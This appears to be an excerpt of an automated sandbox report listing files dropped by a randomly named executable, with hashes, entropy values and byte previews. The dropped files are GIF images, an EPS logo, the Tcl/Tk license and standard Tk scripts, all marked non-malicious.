                                                                                                                                                                                                                              Preview:GIF89a+.@...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....+.@........H. .z..(tp......@...92....#. A.......C.\.%...)Z..1a.8s..W/..@....3..C...y$.GW.....5.FU..j..;.F(Pc+W.-..X.D-[.*g....F..`.:mkT...Lw...A/.....u.7p..a..9P.....q2..Xg..G....3}AKv.\.d..yL.>..1.#
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 354 x 520
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11000
                                                                                                                                                                                                                              Entropy (8bit):7.88559092427108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
                                                                                                                                                                                                                              MD5:45D9B00C4CF82CC53723B00D876B5E7E
                                                                                                                                                                                                                              SHA1:DDD10E798AF209EFCE022E97448E5EE11CEB5621
                                                                                                                                                                                                                              SHA-256:0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
                                                                                                                                                                                                                              SHA-512:6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89ab.................f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....b..........H......*\....#J.H....3j.... '.;p....(.8X..^.0c.I...z8O.\.....:....$..Fu<8`...P.>%I.gO.C.h-..+.`....@..h....dJ.?...K...H.,U.._.#...g..[.*^.x.....J.L.!.'........=+eZ..i..ynF.8...].y|..m.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 87a, 120 x 181
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3889
                                                                                                                                                                                                                              Entropy (8bit):7.425138719078912
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
                                                                                                                                                                                                                              MD5:BD12B645A9B0036A9C24298CD7A81E5A
                                                                                                                                                                                                                              SHA1:13488E4F28676F1E0CE383F80D13510F07198B99
                                                                                                                                                                                                                              SHA-256:4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
                                                                                                                                                                                                                              SHA-512:F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF87ax............................................................................z.....{..o.....m..b...`{.X....vy...hk.Um.N...I`.D..Z^.LP.?R.;!....?C.5C.3#.l..,6.*&.15...`..#(.If.y.....l...._..#/...Hm.>_.y..4R.k..#6..._......w..*K.^.."<.....G{.w..3_."C.Q..F....v..!K...v.2m.)_.[..!R.u.1t.g..)f. X.O..E..1z.g. _.Z..D..:..0..Z.. f.D..0..'z..m.N..C../.z.svC.q/.m.ze7.\..P..I..1%.,...............................................................................................................................................................................................................................................................................................................................................................................................,....x..........H.......D..!...7.PAQ...._l8.... C.<.a...*.x....0q.. ..M.%.<.HBe.@.....Q..7..XC..P..<z3..X...P.jA.%'@.J.lV.......R.,..+....t....7h.....(..a...+^.'..7..L.....V...s..$....a.....8`.9..}K......
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):29706
                                                                                                                                                                                                                              Entropy (8bit):5.33387357427899
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:0warY6a0v4uIqYMEKjodQKOfRtMLcSqDGpf88KFVmlhEtOI/eE7U0a1:03rY6aeIqYMEKjouzfRtMLcSqDGpfbKc
                                                                                                                                                                                                                              MD5:4AE11820D4D592D02CDE458E6F8CE518
                                                                                                                                                                                                                              SHA1:A2E8D3D6191B336D43E48A65C3AE6485B07D93C6
                                                                                                                                                                                                                              SHA-256:87FD9E46DBB5F2BF1529AFB411182C9FB9C58E23D830C66A233AF0C256BB8EFF
                                                                                                                                                                                                                              SHA-512:E0AD4ED570D414BF00931B0F5BBB61FEF981ABDB22ECC42F8E9841905D38874CDFE38F22EDB17ACD0F7539B2932F9C4A865FA73A49BB1458CE05EE10A78BE357
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL PWRD LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:59 PM)..%%BoundingBox: 242 302 377 513..%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe I
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 64 x 100
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1615
                                                                                                                                                                                                                              Entropy (8bit):7.461273815456419
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
                                                                                                                                                                                                                              MD5:DBFAE61191B9FADD4041F4637963D84F
                                                                                                                                                                                                                              SHA1:BD971E71AE805C2C2E51DD544D006E92363B6C0C
                                                                                                                                                                                                                              SHA-256:BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
                                                                                                                                                                                                                              SHA-512:ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89a@.d.............................f.................f...ff.f3.f..33.3.........f..ff.f3.33.3.f..f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....@.d....@.pH,..E.... ..(...H$..v..j....K....q..5L......^).3.Y7..r..u.v|g..om...\iHl..p...`G..\~....fn[q...P.g.Z.l....y...\.l......f.Z.g...%%....e...e...)....O.f..e. ....O..qf..%..(.H.u..]..&....#4.......@.).....u!.M..2. ..PJ..#..T..a.....P.Gi... <Hb....x..z.3.X.O..f.........].Bt..lB.Q.r...9pP....&...L. ..,`[.....E6.Q.....?.#L......|g........N....[.._........."4......b....G6.........m.zI].....I.@.......I.9...glew...2.B..c>./..2....x.....<...{...7;.....y.I.....4G.Qj0..7..%.W.V...?!..[...X..=..k.h..[Q<.....0.B....(P.x.,.......8O*Z.8P!.$....u.c..Ea!..eC....CB.. .H..E..#..C..E...z..&.Nu........c.0..#.T.M.U........l.p @..s.|..pf!..&.......8.#.8.....*..J>. .t..h6(........#..0.A...*!..)...x..u.Z....*%..H.....*.......`......|.....1.......&.....T*...f.l...
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 97 x 150
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2489
                                                                                                                                                                                                                              Entropy (8bit):7.708754027741608
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
                                                                                                                                                                                                                              MD5:711F4E22670FC5798E4F84250C0D0EAA
                                                                                                                                                                                                                              SHA1:1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
                                                                                                                                                                                                                              SHA-256:5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
                                                                                                                                                                                                                              SHA-512:220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89aa...............................f.................f...ff.f3.f..33.3............f..ff.f3.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....a......@.pH,...r.l:..TB.T..V..z..H.j..h...&.......t"....F...d..gN~Y...g....}..r....g.....o...g.......Y.w..W......N....Z....W....f...tL.~.f....New............W.M.r.........O.q........W-./i.*...`..z..F9.../9..-.......$6..G..S...........zB.,nw.64...e4.......HOt......f.....)..OX..C.eU.(.Qh.....T..<Q.Y.P.L.YxT....2........ji..3.^)zz..O.a..6 ...TZ........^...7.....>|P.....w$...k.ZF.\R.u....F.]Z.--(v+)[Y....=.!.W..+.]..]._.....&..../Ap...j...!..b.:...{.^.=.`...U.....@Hf..\?.(..Lq@.........0..L...a...&.!.....]#..]G \..q...A.H.X[...(.W......,...1a..B...W(.t.8.AdG.)..(P=...Uu.u..A.KM\...'r.R./.W..d2a.0..G...?...B......#H........1Q.0...R....%+...0.I..{.<......QV.tz'.yn.E.p..0i.I.g......L....%....K...A.l.ph.Q.1e...Z....g..2e...smU&d;.J..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 113 x 175
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2981
                                                                                                                                                                                                                              Entropy (8bit):7.758793907956808
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
                                                                                                                                                                                                                              MD5:DA5FB10F4215E9A1F4B162257972F9F3
                                                                                                                                                                                                                              SHA1:8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
                                                                                                                                                                                                                              SHA-256:62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
                                                                                                                                                                                                                              SHA-512:990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89aq...............................f.................f...ff.f3.f..33.3............f..ff.f3.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3................................................................!.. -dl-.!.......,....q......@.pH,...r.l:....A}H...v..R......D.VF..,%M....^.....fyzU.P..f...i.....t..Uqe..N..Z..i......~....g......u.....g......\...h.....P...h.....Q..g....Z..h......]......\...M...[..s...c2.+R.$. ......#.....)v..4....MO.b.....9......[.M.........h'..<-..=.....HQD....D?.~......W7. ..V.W0..l....*0p}..KP?c.\@KW.S(..M..B.....-q...S2...*.,..P.{....F..._MAn ....i.Y3............zh.y.j@...a876...ui.i..;K.........p...`.,}w....tv.m...Y..........;.;.e).e&.......-.NC.*4..(........*..F........[,w....f......E....h..a3.T.^.........)...C.N8.h\T...+&.z....g]H..B..#.t6..Z.....j.-..N......TI....A........M?..Q&V'...Mb.f.x...h.$r.U .9..Ci. ].4.Zb..@...X....%..<..b)V!........Y)x......T.....h.p.d..h..(........]@.**J.M.U.Jf...Y.:....F..g:..d..6q.-..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 130 x 200
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3491
                                                                                                                                                                                                                              Entropy (8bit):7.790611381196208
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
                                                                                                                                                                                                                              MD5:A5E4284D75C457F7A33587E7CE0D1D99
                                                                                                                                                                                                                              SHA1:FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
                                                                                                                                                                                                                              SHA-256:BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
                                                                                                                                                                                                                              SHA-512:4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89a................................f.................f...ff.f3.f..33.3............f..ff.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,...........@.pH,...r.l:..T..F$XIe..V$.x..V.Z.z..F.pxd~..........{....o....l..{.b...hi[}P.k...y.....y.f.._R.\...............m.....y.....x......^.Q...j.....\S.....^.......l......]...[.......).....{....7...`..<...`..">..i.?/..@............>..Z.z@....0B..r...j.V.I.@..;%R...*...J.p.A.t.*..$A*...>`.....@g5BP.A..p.x.............q..8...... ...(.Q..#..@...F..YSK..M..#o.....D.m..-.....k}...BT..V......'.....`.d..~;..9+..6...<b.eZ..y^0]0..I...=.6.....}.0<.Z...M...Y1*35.e.....b...U0F~.-.HT......l2.s.q`-....y...e....dPZ....~.zT.M.... "r.E/k. ...*..Lj@'........Pcd&.(..mxF_w.."K..x!..--Y`..A.....Be.jH.A..\..j.....du#.....]^...>......].i.FMO..].9n1",Y...F...EW.9.....0TY.T...Cv!i`%...Hz@.]..U.!Y...#Dv&pi.z(.mn.A....@Q.0.%...&.4.v.cw(.`cd'|..M9..."...,*.......
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 48 x 75
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1171
                                                                                                                                                                                                                              Entropy (8bit):7.289201491091023
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
                                                                                                                                                                                                                              MD5:7013CFC23ED23BFF3BDA4952266FA7F4
                                                                                                                                                                                                                              SHA1:E5B1DED49095332236439538ECD9DD0B1FD4934B
                                                                                                                                                                                                                              SHA-256:462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
                                                                                                                                                                                                                              SHA-512:A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89a0.K.............................f.................f...ff.f3.f..33.3.........f..ff.f3.3f.33.3.f..ff.ff.f3ff333f.3f.33.33f.3......................................................................!.. -dl-.!.......,....0.K....@.pH,...GD.<:..%SR.Z......<.V.$l.....z......:.. .|v[D..f...z.W.G.Vr...NgsU.yl..qU..`.......`fe`.......Fg....(.&...g.Y.. .."..q.V.$.'.Ez.W....y...Y.U...(#Xrf.........Xux.U..........(U.4...X....G.B..t..1S...R..Y. ...l ..".>.h......,%K....A.....<s....#..8.iK.....a.y$h..DQh.PE)....6.....MyL.qzF..... ."..Y0..a......2..*t..Ma..b...M..R.....\..st..=....Q......,>s`....Qt.,..B.R.....!.$..%.....(...s...B.T...`,".h(. D....8..dC..\Q.p.......x.#A.....:..du..(D.XV......7....S.#n8a....2`...f.:G,...==(......`!..$...t....b..../N|...f..J.x... P&.|.d._!N...].1w.3D.0!....@o&H...N.B.J....pz8..w.i....=r.............@5.-!.......H."..[.j.AB<..p....h...V.D..6.h...ab1F.g...I !.V~.H..V.........:.G..|c...,.....TD5..c[.W.....LC.....FJ..71[..lH.M.....8.:$......
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5473
                                                                                                                                                                                                                              Entropy (8bit):7.754239979431754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
                                                                                                                                                                                                                              MD5:048AFE69735F6974D2CA7384B879820C
                                                                                                                                                                                                                              SHA1:267A9520C4390221DCE50177E789A4EBD590F484
                                                                                                                                                                                                                              SHA-256:E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
                                                                                                                                                                                                                              SHA-512:201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89ad.d...................RJJ...B99.......RBB..B11ZBB!....R991!!...)....{{B!!R)).JJ.ss.ZZ.BB.kk.RR.JJ.BB9...JJR!!.ZZ.BB.11.99.{s.sk.kc.cZ.ZR.JB.ZR.JB.JB.RJ.B9.91.B9...{.JB.91.B9.B9.1){)!.)!.9)..ZR.JB{91.cR{1).ZJ.ZJ.RB.J9.B1.B1.9).1!....{B9.{k.scc1).kZZ)!c)!.9).B1.9).9).1!.1!.1!.B).9!.9!.1..).....{.sZ1)R)!.B1.B1.ZBR!..9).ZB.9).R9.R9.1!.J1.J1.B).B).9!.9!.1..1..).....sZ.J9.ZB.cJJ!.{1!.B).9!{)..9!.J).B!.B!.9..R1).kJ)!.B1{9).R9.cB.Z9.Z9.B).Z9.B).R1.9!.R1.J).J).B!.1..9....{.s.J9.{Z.ZB.sR.kJk1!.cB.cB.R1.R).1..B!.J!.B.....R91.J1).c.kJ.J).Z1.B!.B!..9!..{R.sJ.Z9.R1{9!..s.R9.Z...J91Z9){B)...............B91..1)!..............................RJR............B)1......R19........BJ.9B..{..s{......!.......,....d.d.@............0@PHa....*.p...7.8.y...C.s6Z.%Q.#s.`:B.N....4jd.K.0..|y....F@.......1~ ......'Y.B"C&R.V.R.4$k.3...D.......Ef*Y3..M........BDV._.....\..).]..>s..$H\%y0WL...d.......D..'..v..1Kz.Zp$;S
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2307
                                                                                                                                                                                                                              Entropy (8bit):5.135743409565932
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:XU/zAcKT6yOCaDBfsHLk32s3J5w83KDyP1BXy3JQz7yuC:XNc+92sg3A8uyDXy3JQnDC
                                                                                                                                                                                                                              MD5:F090D9B312C16489289FD39813412164
                                                                                                                                                                                                                              SHA1:1BEC6668F6549771DADC67D153B89B8F77DCD4B9
                                                                                                                                                                                                                              SHA-256:0D1E4405F6273F091732764ED89B57066BE63CE64869BE6C71EA337DC4F2F9B5
                                                                                                                                                                                                                              SHA-512:57B323589C5A8D9CBB224416731D8CE65C4B94146DF15CE30885DF63B1D0B3F709093B65390A911F84F20B7C5DE3C0AF9B4D7D531742BE046EDA6E8C3432EF6E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This software is copyrighted by the Regents of the University of..California, Sun Microsystems, Inc., Scriptics Corporation, ActiveState..Corporation, Apple Inc. and other parties. The following terms apply to..all files associated with the software unless explicitly disclaimed in..individual files.....The authors hereby grant permission to use, copy, modify, distribute,..and license this software and its documentation for any purpose, provided..that existing copyright notices are retained in all copies and that this..notice is included verbatim in any distributions. No written agreement,..license, or royalty fee is required for any of the authorized uses...Modifications to this software may be copyrighted by their authors..and need not follow the licensing terms described here, provided that..the new terms are clearly indicated on the first page of each file where..they apply.....IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY..FOR DIRECT, INDIRECT, SPECIAL, INCI
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15255
                                                                                                                                                                                                                              Entropy (8bit):4.9510475386072095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:apDYV5Yupn5OcckwBv3HCpg2J8JvJBfWeZhXkz+WkHGowv:aPPkevB2JuvJ9D3XmSc
                                                                                                                                                                                                                              MD5:804E6DCE549B2E541986C0CE9E75E2D1
                                                                                                                                                                                                                              SHA1:C44EE09421F127CF7F4070A9508F22709D06D043
                                                                                                                                                                                                                              SHA-256:47C75F9F8348BF8F2C086C57B97B73741218100CA38D10B8ABDF2051C95B9801
                                                                                                                                                                                                                              SHA-512:029426C4F659848772E6BB1D8182EB03D2B43ADF68FCFCC1EA1C2CC7C883685DEDA3FFFDA7E071912B9BDA616AD7AF2E1CB48CE359700C1A22E1E53E81CAE34B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# listbox.tcl --..#..# This file defines the default bindings for Tk listbox widgets..# and provides procedures that help in implementing those bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....#--------------------------------------------------------------------------..# tk::Priv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...# listboxPrev -.The last element to be selected or deselected..#...during a selection operation...# listboxSelection -.All of the items that were selected before the..#...current selection operation (such as a mouse..#...drag) started; used to cancel an operation...#--------------------------------------------------------------------------....#--------------
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9862
                                                                                                                                                                                                                              Entropy (8bit):4.786615174847384
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:mvEEVwjVwqOpOLbkVAg/vyKEZ25YbKZbwrmQ:mvEEVwJwpALPgnyx25YGZkr3
                                                                                                                                                                                                                              MD5:D83ED6AC2912900040530528A0237AB3
                                                                                                                                                                                                                              SHA1:2D18E42A8B96C3D71C1C6701010FDF75C1E6D5D8
                                                                                                                                                                                                                              SHA-256:848258B946C002E2696CA3815A1589C8120AF5CC41FBC11BBD9A3F5754CC21AF
                                                                                                                                                                                                                              SHA-512:00B4CD0D58029FC37820C163A4AE1DEAD22FB5C767BDC118659EACE26D449C362189611DFB3FAB1AC129FABFEC2CE853EA2C10D418FAE5AEB91DDC9330FF782D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# megawidget.tcl..#..#.Basic megawidget support classes. Experimental for any use other than..#.the ::tk::IconList megawdget, which is itself only designed for use in..#.the Unix file dialogs...#..# Copyright (c) 2009-2010 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....package require Tk.....::oo::class create ::tk::Megawidget {.. superclass ::oo::class.. method unknown {w args} {...if {[string match .* $w]} {... [self] create $w {*}$args... return $w...}...next $w {*}$args.. }.. unexport new unknown.. self method create {name superclasses body} {...next $name [list \....superclass ::tk::MegawidgetClass {*}$superclasses]\;$body.. }..}....::oo::class create ::tk::MegawidgetClass {.. variable w hull options IdleCallbacks.. constructor args {...# Extract the "widget name" from the object name...set w [namespace tail [self]].....# Configure things...
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39790
                                                                                                                                                                                                                              Entropy (8bit):4.915612301723047
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:NKJsO8O4IzOQjJwxzire5pKVjriecYyq4CpKgnP:NKJsO8iOQizire54lriecYf40
                                                                                                                                                                                                                              MD5:B7DAA21C1C192B8CB5B86CBD7B2CE068
                                                                                                                                                                                                                              SHA1:AE8ABF9017F37CCDF5D0D15DE66BB124A7482BA0
                                                                                                                                                                                                                              SHA-256:312AF944A276CDBF1EE00757EF141595670984F7F13E19922C25643A040F5339
                                                                                                                                                                                                                              SHA-512:B619E3B8BE5EC4545E97B7A7A7F7FECC2AAFA58438F9CA3819F644720CF5FF5C44DA12AC25988570E595D97CAD799F87D93C24D5E67A7A953B9F5312952FBEB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# menu.tcl --..#..# This file defines the default bindings for Tk menus and menubuttons...# It also implements keyboard traversal of menus and implements a few..# other utility procedures related to menus...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# cursor -..Saves the -cursor option for the posted menubutton...# focus -..Saves the focus during a menu selection operation...#...Focus gets restored here when the menu is unposted...# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if..#...tk::Priv(oldGrab) is non
